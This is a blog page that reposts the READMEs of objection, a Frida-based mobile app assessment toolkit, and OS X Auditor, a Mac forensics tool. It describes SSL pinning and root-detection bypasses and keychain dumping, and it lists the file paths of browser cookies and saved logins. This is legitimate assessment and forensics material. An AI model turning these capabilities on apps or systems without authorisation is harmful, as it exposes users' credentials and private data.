Termux ID: SQLite -->

    Social Items

Home / SQLite

objection is a runtime mobile exploration toolkit, powered by Frida. It was built with the aim of helping assess mobile applications and their security posture without the need for a jailbroken or rooted mobile device.
The project's name quite literally explains the approach as well, whereby runtime specific objects are injected into a running process and executed using Frida.
Note: This is not some form of jailbreak / root bypass. By using objection, you are still limited by all of the restrictions imposed by the applicable sandbox you are facing.

features
Supporting both iOS and Android and having new features and improvements added regularly as the tool is used in real world scenarios, the following is a short list of only a few key features:
For all supported platforms, objection allows you to:
  • Patch iOS and Android applications, embedding a Frida gadget that can be used with objection or just Frida itself.
  • Interact with the filesystem, listing entries as well as upload & download files where permitted.
  • Perform various memory related tasks, such as listing loaded modules and their respective exports.
  • Attempt to bypass and simulate jailbroken or rooted environments.
  • Discover loaded classes and list their respective methods.
  • Perform common SSL pinning bypasses.
  • Dynamically dump arguments from methods called as you use the target application.
  • Interact with SQLite databases inline without the need to download the targeted database and use an external tool.
  • Execute custom Frida scripts.
iOS specific features in objection include the ability to:
  • Dump the iOS keychain, and export it to a file.
  • Dump data from common storage such as NSUserDefaults and the shared NSHTTPCookieStorage.
  • Dump various formats of information in human readable forms.
  • Bypass certain forms of TouchID restrictions.
  • Watch for method executions by targeting all methods in a class, or just a single method.
  • Monitor the iOS pasteboard.
  • Dump encoded .plist files in a human readable format without relying on external parsers.
Android specific features in objection include the ability to:
  • List the applications Activities, Services and Broadcast receivers.
  • Start arbitrary Activities available in the target application.
  • Watch a class method, reporting execution as it happens.

screenshots
The following screenshots show the main objection repl, connected to a test application on both an iPad running iOS 10.2.1, and Samsung Galaxy S5 running Android 6.

A file system listing of the iOS applications main bundle


A file system listing of the Android applications bundle


iOS Keychain dumped for the current application, and later written to a file called keychain.json


Inline SQLite query tool


SSL Pinning bypass running for an iOS application


SSL Pinning bypass running for an Android application


sample usage
A sample session, where objection version 0.1 is used to explore the applications environment. Newer versions have the REPL prompt set to the current applications name, however usage has remained the same:



prerequisites
To run objection, all you need is the python3 interpreter to be available. Installation via pip should take care of all of the dependencies needed. For more details, please see the prerequisites section on the project wiki.
As for the target mobile applications though, for iOS, an unencrypted IPA is needed and Android just the normal APK should be fine. If you have the source code of the iOS application you want to explore, then you can simply embed and load the FridaGadget.dylib from within the Xcode project.

installation
Installation is simply a matter of pip3 install objection. This will give you the objection command.
For more detailed update and installation instructions, please refer to the wiki page here.


objection - Runtime Mobile Exploration


OS X Auditor is a free Mac OS X computer forensics tool.
OS X Auditor parses and hashes the following artifacts on the running system or a copy of a system you want to analyze:
  • the kernel extensions
  • the system agents and daemons
  • the third party's agents and daemons
  • the old and deprecated system and third party's startup items
  • the users' agents
  • the users' downloaded files
  • the installed applications
It extracts:
  • the users' quarantined files
  • the users' Safari history, downloads, topsites, LastSession, HTML5 databases and localstore
  • the users' Firefox cookies, downloads, formhistory, permissions, places and signons
  • the users' Chrome history and archives history, cookies, login data, top sites, web data, HTML5 databases and local storage
  • the users' social and email accounts
  • the WiFi access points the audited system has been connected to (and tries to geolocate them)
It also looks for suspicious keywords in the .plist themselves.
It can verify the reputation of each file on:
  • Team Cymru's MHR
  • VirusTotal
  • your own local database
It can aggregate all logs from the following directories into a zipball:
  • /var/log (-> /private/var/log)
  • /Library/logs
  • the user's ~/Library/logs
Finally, the results can be:
  • rendered as a simple txt log file (so you can cat-pipe-grep in them… or just grep)
  • rendered as a HTML log file
  • sent to a Syslog server

Author
Jean-Philippe Teissier - @Jipe_ & al.

Support
OS X Auditor started as a week-end project and is now barely maintained. It has been forked by the great guys @ Yelp who created osxcollector.
If you are looking for a production / corporate solution I do recommend you to move to osxcollector (https://github.com/Yelp/osxcollector)

How to install
Just copy all files from GitHub.

Dependencies
If you plan to run OS X Auditor on a Mac, you will get a full plist parsing support with the OS X Foundation through pyobjc:
pip install pyobjc
If you can't install pyobjc or if you plan to run OS X Auditor on another OS than Mac OS X, you may experience some troubles with the plist parsing:
pip install biplist
pip install plist
These dependencies will be removed when a working native plist module will be available in python

How to run
  • OS X Auditor runs well with python >= 2.7.2 (2.7.9 is OK). It does not run with a different version of python yet (due to the plist nightmare)
  • OS X Auditor is maintained to work on the lastest OS X version. It will do its best on older OS X versions.
  • You must run it as root (or via sudo) if you want to use is on a running system, otherwise it won't be able to access some system and other users' files
  • If you're using API keys from environment variables (see below), you need to use the sudo -E to use the users environment variables
Type osxauditor.py -h to get all the available options, then run it with the selected options
eg. [sudo -E] python osxauditor.py -a -m -l localhashes.db -H log.html

Setting Environment Variables
VirusTotal API:
export VT_API_KEY=aaaabbbbccccddddeeee

Artifacts

Users
  • Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2
  • Library/Preferences/com.apple.LaunchServices.QuarantineEvents
  • Library/Preferences/com.apple.loginitems.plist
  • Library/Mail Downloads/
  • Library/Containers/com.apple.mail/Data/Library/Mail Downloads
  • Library/Accounts/Accounts3.sqlite
  • Library/Containers/com.apple.mail/Data/Library/Mail/V2/MailData/Accounts.plist
  • Library/Preferences/com.apple.recentitems.plist
  • Firefox
  • Library/Application Support/Firefox/Profiles/
  • cookies.sqlite
  • downloads.sqlite
  • formhistory.sqlite
  • places.sqlite
  • signons.sqlite
  • permissions.sqlite
  • addons.sqlite
  • extensions.sqlite
  • content-prefs.sqlite
  • healthreport.sqlite
  • webappsstore.sqlite
  • Safari
  • Library/Safari/
  • Downloads.plist
  • History.plist
  • TopSites.plist
  • LastSession.plist
  • Databases
  • LocalStorage
  • Chrome
  • Library/Application Support/Google/Chrome/Default/
  • History
  • Archived History
  • Cookies
  • Login Data
  • Top Sites
  • Web Data
  • databases
  • Local Storage

System
  • /System/Library/LaunchAgents/
  • /System/Library/LaunchDaemons/
  • /System/Library/ScriptingAdditions/
  • /System/Library/StartupItems/Library/ScriptingAdditions/
  • /System/Library/Extensions/
  • /System/Library/CoreServices/SystemVersion.plist
  • /Library/LaunchAgents/
  • /Library/LaunchDaemons/
  • /Library/StartupItems/
  • /Library/Preferences/SystemConfiguration/com.apple.airport.preferences.plist
  • /Library/logs
  • /var/log
  • /etc/localtime
  • StartupParameters.plist
  • /private/var/db/dslocal/nodes/Default/groups/admin.plist
  • /private/var/db/dslocal/nodes/Default/users

Related work

Disk Arbitrator
Disk Arbitrator is Mac OS X forensic utility designed to help the user ensure correct forensic procedures are followed during imaging of a disk device. Disk Arbitrator is essentially a user interface to the Disk Arbitration framework, which enables a program to participate in the management of block storage devices, including the automatic mounting of file systems. When enabled, Disk Arbitrator will block the mounting of file systems to avoid mounting as read-write and violating the integrity of the evidence.
https://github.com/aburgh/Disk-Arbitrator

Volafox
volafox a.k.a 'Mac OS X Memory Analysis Toolkit' is developed on python 2.x
https://code.google.com/p/volafox/

Mandiant Memoryze(tm) for the Mac
Memoryze for the Mac is free memory forensic software that helps incident responders find evil in memory… on Macs. Memoryze for the Mac can acquire and/or analyze memory images. Analysis can be performed on offline memory images or on live systems.
http://www.mandiant.com/resources/download/mac-memoryze

Volatility MacMemoryForensics
https://code.google.com/p/volatility/wiki/MacMemoryForensics


OSXAuditor - Free Mac OS X Computer Forensics Tool

Subscribe to: Posts (Atom)